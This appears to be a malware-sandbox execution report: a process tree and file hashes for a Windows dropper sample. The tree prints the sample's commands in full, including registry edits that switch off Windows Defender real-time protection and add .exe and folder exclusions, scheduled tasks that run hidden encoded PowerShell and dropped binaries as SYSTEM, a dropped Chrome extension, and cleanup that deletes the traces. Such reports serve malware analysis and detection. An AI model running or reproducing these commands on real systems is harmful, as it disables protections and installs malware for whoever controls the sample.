\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1104
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1888
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:972 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:432
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:324
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqXOKbgCc" /SC once /ST 01:48:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqXOKbgCc"4⤵PID:836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqXOKbgCc"4⤵PID:1280
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdfoyumcZcUHpblShd" /SC once /ST 16:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VOvvWDrUdcvniUglP\EWNQHYiQPwWBNWK\bQoDNKF.exe\" KU /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:580
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4A14B0C0-FE72-4A49-B65C-161C94B002E7} S-1-5-21-3406023954-474543476-3319432036-1000:VUIIVLGQ\Admin:Interactive:[1]1⤵PID:1100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1756 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1036
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1900
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:316 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1688
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1924 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1720
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1696
-
C:\Windows\system32\taskeng.exetaskeng.exe {D1D10B27-7BC3-4AB9-930D-C6E0C6760591} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:964
-
C:\Users\Admin\AppData\Local\Temp\VOvvWDrUdcvniUglP\EWNQHYiQPwWBNWK\bQoDNKF.exeC:\Users\Admin\AppData\Local\Temp\VOvvWDrUdcvniUglP\EWNQHYiQPwWBNWK\bQoDNKF.exe KU /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1084 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdjwhgSDX" /SC once /ST 12:26:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gdjwhgSDX"3⤵PID:1588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gdjwhgSDX"3⤵PID:1708
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1572
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1580
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1180
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gQBoZAesM" /SC once /ST 04:27:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gQBoZAesM"3⤵PID:1264
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gQBoZAesM"3⤵PID:1360
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XjHlGSKYxAVPjBec" /t REG_DWORD /d 0 /reg:323⤵PID:1060
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XjHlGSKYxAVPjBec" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XjHlGSKYxAVPjBec" /t REG_DWORD /d 0 /reg:643⤵PID:2000
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XjHlGSKYxAVPjBec" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XjHlGSKYxAVPjBec" /t REG_DWORD /d 0 /reg:323⤵PID:1612
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XjHlGSKYxAVPjBec" /t REG_DWORD /d 0 /reg:324⤵PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XjHlGSKYxAVPjBec" /t REG_DWORD /d 0 /reg:643⤵PID:1036
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XjHlGSKYxAVPjBec" /t REG_DWORD /d 0 /reg:644⤵PID:428
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\XjHlGSKYxAVPjBec\jIZwIQmX\UvLPvxhvqPGjMuTW.wsf"3⤵PID:1180
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\XjHlGSKYxAVPjBec\jIZwIQmX\UvLPvxhvqPGjMuTW.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1516 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqrrxjlU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqrrxjlU" /t REG_DWORD /d 0 /reg:644⤵PID:280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JtLkyMWteakTC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JtLkyMWteakTC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OGTLbgiSVWUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OGTLbgiSVWUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLRqzGmYJgsU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLRqzGmYJgsU2" /t REG_DWORD /d 0 /reg:644⤵PID:1608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twjvPogQWztidxzVwKR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twjvPogQWztidxzVwKR" /t REG_DWORD /d 0 /reg:644⤵PID:956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ZWvXpCnXnXECFEVB" /t REG_DWORD /d 0 /reg:324⤵PID:2000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ZWvXpCnXnXECFEVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VOvvWDrUdcvniUglP" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VOvvWDrUdcvniUglP" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XjHlGSKYxAVPjBec" /t REG_DWORD /d 0 /reg:324⤵PID:1772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XjHlGSKYxAVPjBec" /t REG_DWORD /d 0 /reg:644⤵PID:836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqrrxjlU" /t REG_DWORD /d 0 /reg:324⤵PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqrrxjlU" /t REG_DWORD /d 0 /reg:644⤵PID:1924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JtLkyMWteakTC" /t REG_DWORD /d 0 /reg:324⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JtLkyMWteakTC" /t REG_DWORD /d 0 /reg:644⤵PID:1964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OGTLbgiSVWUn" /t REG_DWORD /d 0 /reg:324⤵PID:756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OGTLbgiSVWUn" /t REG_DWORD /d 0 /reg:644⤵PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLRqzGmYJgsU2" /t REG_DWORD /d 0 /reg:324⤵PID:1524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLRqzGmYJgsU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twjvPogQWztidxzVwKR" /t REG_DWORD /d 0 /reg:324⤵PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twjvPogQWztidxzVwKR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ZWvXpCnXnXECFEVB" /t REG_DWORD /d 0 /reg:644⤵PID:624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ZWvXpCnXnXECFEVB" /t REG_DWORD /d 0 /reg:324⤵PID:524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VOvvWDrUdcvniUglP" /t REG_DWORD /d 0 /reg:324⤵PID:1728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VOvvWDrUdcvniUglP" /t REG_DWORD /d 0 /reg:644⤵PID:584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XjHlGSKYxAVPjBec" /t REG_DWORD /d 0 /reg:324⤵PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XjHlGSKYxAVPjBec" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1772
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBWgZwJeg" /SC once /ST 15:46:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBWgZwJeg"3⤵PID:1584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBWgZwJeg"3⤵PID:1900
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1724
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1692
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1572
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OiTltHgjKWdZWRHAU" /SC once /ST 04:44:16 /RU "SYSTEM" /TR "\"C:\Windows\Temp\XjHlGSKYxAVPjBec\fOdoFAaDlqiRTwA\CBBXxrB.exe\" oi /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "OiTltHgjKWdZWRHAU"3⤵PID:1280
-
-
-
C:\Windows\Temp\XjHlGSKYxAVPjBec\fOdoFAaDlqiRTwA\CBBXxrB.exeC:\Windows\Temp\XjHlGSKYxAVPjBec\fOdoFAaDlqiRTwA\CBBXxrB.exe oi /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1008 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bdfoyumcZcUHpblShd"3⤵PID:908
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:912
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1772
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1408
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\AMqrrxjlU\VBdluO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "mATwwnhlBarNIjG" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mATwwnhlBarNIjG2" /F /xml "C:\Program Files (x86)\AMqrrxjlU\zSpSCQD.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "mATwwnhlBarNIjG"3⤵PID:2020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mATwwnhlBarNIjG"3⤵PID:1548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PUUpgQjRxTeQXR" /F /xml "C:\Program Files (x86)\kLRqzGmYJgsU2\UWvwquc.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YnOsdguPUeMBf2" /F /xml "C:\ProgramData\ZWvXpCnXnXECFEVB\RaPhvAA.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvcvGeMNYvVMyySVJ2" /F /xml "C:\Program Files (x86)\twjvPogQWztidxzVwKR\yPoIqte.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jxOafXtUvoBHWrxtEcP2" /F /xml "C:\Program Files (x86)\JtLkyMWteakTC\hnLYQcn.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rqvLerMPUMdrWDDQN" /SC once /ST 00:18:53 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\XjHlGSKYxAVPjBec\sPSIkIRl\xzyRzdQ.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "rqvLerMPUMdrWDDQN"3⤵PID:1696
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:832
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1380
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1896
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OiTltHgjKWdZWRHAU"3⤵PID:1508
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\XjHlGSKYxAVPjBec\sPSIkIRl\xzyRzdQ.dll",#1 /site_id 5254032⤵PID:1280
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\XjHlGSKYxAVPjBec\sPSIkIRl\xzyRzdQ.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:820 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rqvLerMPUMdrWDDQN"4⤵PID:1512
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1896
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1896
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1867235866579665421-20653426011857734602-1263793066-18366638761960680541-3769366"1⤵
- Windows security bypass
PID:280
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1092807519-1093962115398020456474202283-90622490326040304815820421572039309728"1⤵
- Windows security bypass
PID:2000
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1965898280392228661-13134036364544994931427978165598748917-422951147-2140923506"1⤵
- Windows security bypass
PID:836
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1928
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d598467185455a03c9f039512c3e69ff
SHA19201ff2b45c9eac0f7e3a113355f285056852036
SHA2561754f3865e4b18ef880785d1179f5caf04fc8339c7e3d0bae78c1b2a9348610d
SHA512d9b3696f68f71d9b6b23c121af3b10a3f3e3550641c41b31a85a546b2eaee4cfac9a614b410910e8a52bfb01c84bbcd3d41dce8cff81e350d36b03d9e776e04c
-
Filesize
2KB
MD54b2dc946a7b35cb17e10f6fec9593056
SHA19ba800bfa70100dcda072ab2440cee7618fcd596
SHA25636a6b7d0aaafc7d5d97be174f3ea2e5acc5cb8271c511cb2b4f86b6583dfc182
